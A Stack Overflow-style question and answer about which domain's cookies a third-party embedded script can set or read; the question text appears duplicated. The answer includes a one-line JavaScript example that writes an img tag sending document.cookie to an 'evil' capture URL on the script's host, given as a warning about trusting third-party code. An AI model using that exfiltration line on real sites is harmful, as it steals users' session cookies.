I've read a lot of content online about cookies, but nothing addressing this question: Let's say I have a server at a and a web page served by b embeds a script in that web page which lives on my server:
<script src='a/script.js'></script>
What is that script allowed to do in terms of setting cookies? Can it set a cookie with domain=a? I'd assume so since the script is served from that domain. Can it also set a cookie with domain=b since the page is served from that server?
I'm trying to get my head around what "first-party" and "third-party" mean in the context of my script called from another host's web page.
I've read a lot of content online about cookies, but nothing addressing this question: Let's say I have a server at a. and a web page served by b. embeds a script in that web page which lives on my server:
<script src='a./script.js'></script>
What is that script allowed to do in terms of setting cookies? Can it set a cookie with domain=a.? I'd assume so since the script is served from that domain. Can it also set a cookie with domain=b. since the page is served from that server?
I'm trying to get my head around what "first-party" and "third-party" mean in the context of my script called from another host's web page.
Share Improve this question edited Sep 1, 2015 at 21:47 Deduplicator 45.8k7 gold badges72 silver badges123 bronze badges asked Nov 24, 2013 at 1:30 user3026299user3026299 1411 silver badge3 bronze badges1 Answer
Reset to default 8I don't believe the origin of a .js file is relevant. The cookie domain has to do with the domain of the document being rendered.
If I visit http://www.b./ and it includes
<script src="http://www.a./some/file.js"></script>
Then b. is trusting a.'s code to act in good faith. The code executes as part of the page being viewed. Since the javascript code will execute in the browser, it could read cookies from b. and pass that data along by creating an tag in the document where src includes the data.
For example, if a.'s javascript file includes
document.writeln("<img src='http://www.a./evil/data/capturer?" + document.cookie + "'>");
Then the malicious webmaster of a. could check his web server logs and see b.'s cookies.
So, the question is, if a. is malicious, why did b. include code from a. in their page? They probably didn't. As web developers, we need to verify the trustworthiness of any 3rd party code we embed in our sites.